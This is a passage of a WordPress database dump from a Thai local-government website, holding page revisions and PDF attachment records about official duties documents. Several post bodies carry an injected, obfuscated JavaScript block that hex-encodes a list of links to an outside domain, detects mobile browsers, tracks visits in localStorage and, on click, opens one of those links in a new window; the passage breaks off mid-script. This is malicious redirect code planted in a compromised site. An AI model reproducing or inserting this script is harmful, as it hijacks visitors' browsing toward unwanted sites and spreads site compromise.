allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:44:15','2024-08-08 14:44:15','',14,'http://pakhaeng.ssk.in.th/?p=765',0,'revision','',0),
(767,1,'2024-08-09 10:51:42','2024-08-09 03:51:42','','อำนาจหน้าที่O3','','inherit','','closed','','%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%b2%e0%b8%88%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88o3','','','2024-08-09 10:51:42','2024-08-09 03:51:42','',542,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/อำนาจหน้าที่O3.pdf',0,'attachment','application/pdf',0),
(768,1,'2024-08-09 10:52:25','2024-08-09 03:52:25','<!-- wp:file {\"id\":767,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/อำนาจหน้าที่O3.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/อำนาจหน้าที่O3.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"อำนาจหน้าที่O3\"></object><a id=\"wp-block-file--media-888544bd-bf38-4c15-97b3-9bea7c8131ed\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/อำนาจหน้าที่O3.pdf\">อำนาจหน้าที่O3</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/อำนาจหน้าที่O3.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-888544bd-bf38-4c15-97b3-9bea7c8131ed\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','อำนาจหน้าที่','','inherit','closed','closed','','542-revision-v1','','','2024-08-09 10:52:25','2024-08-09 03:52:25','',542,'http://pakhaeng.ssk.in.th/?p=768',0,'revision','',0),
(769,1,'2024-08-09 11:46:30','2024-08-09 04:46:30','','O4อำนาจหน้าที่','','inherit','','closed','','o4%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%b2%e0%b8%88%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88','','','2024-08-09 11:46:30','2024-08-09 04:46:30','',542,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf',0,'attachment','application/pdf',0),
(770,1,'2024-08-09 11:47:01','2024-08-09 04:47:01','<!-- wp:file {\"id\":769,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"O4อำนาจหน้าที่\"></object><a id=\"wp-block-file--media-b9970199-24a4-4fe2-adae-06989ee49b2b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\">O4อำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b9970199-24a4-4fe2-adae-06989ee49b2b\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 